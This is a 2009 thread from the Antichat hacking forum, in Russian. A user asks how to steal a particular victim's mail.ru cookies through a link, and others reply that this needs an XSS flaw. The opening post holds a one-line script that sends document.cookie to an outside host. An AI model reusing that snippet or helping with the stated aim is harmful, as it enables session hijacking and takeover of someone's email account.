Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   Кража куки через клик по ссылке (https://forum.antichat.xyz/showthread.php?t=119097)

LemoTTT 04.05.2009 21:25

Кража куки через клик по ссылке
 
если я на бесплатном хосте сделаю хтмл страницу с скриптом, который тырит куки
Код HTML:

<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
и жертва откроет по ссылке ету страницу, то у меня будут куки или нет?
ЗЫ: пишем те, кто уже точно знает!

fl00der 04.05.2009 21:27

В общем случае куки можно получить только в рамках одного домена.

LemoTTT 04.05.2009 21:38

смотри, я послал жертве на мейл.ру она открыла ссылку етой странице, у меня буду ее куки от почтового ящика?!

pento 04.05.2009 21:44

не будут

LemoTTT 04.05.2009 21:46

так как же можно получить куки, если жертва киликает по ссылки, как? какой скрипт, уже много статей почитал инфы 0!искать xss ето не к етой теме!

Tigger 04.05.2009 21:59

Ты, видимо, не понимаешь, что куки без xss не своруешь.

LemoTTT 04.05.2009 22:02

та бред ети xss, если меня интересует определенное мыло, и xss на нем нету, как кто то же можно угнать куки!!!!!!!
ЗЫ брут бредддддддд!

Ershik 04.05.2009 22:28

Бред говоришь ты.
У тебя есть колеса - этот скрипт. Но нет двигателя XSS
Как ты без двигателя толкнешь колеса?
Да никак.
Xss и используется, чтобы сookie своровать.

LemoTTT 04.05.2009 22:40

ну вот например в3ять мейл ру, именно почту, а не другие ресурсы, наврядли там есть xss
Зы: 1. пасивная xss что нам дает, с ней моно гнать куки
2. и вообще пасивніе же xss должні прибивать, коль о них много народу знает!

LemoTTT 04.05.2009 22:41

ну вот например в3ять мейл ру, именно почту, а не другие ресурсы, наврядли там есть xss
Зы: 1. пасивная xss что нам дает, с ней моно гнать куки
2. и вообще пасивніе же xss должны прибивать, коль о них много народу знает!


Время: 20:42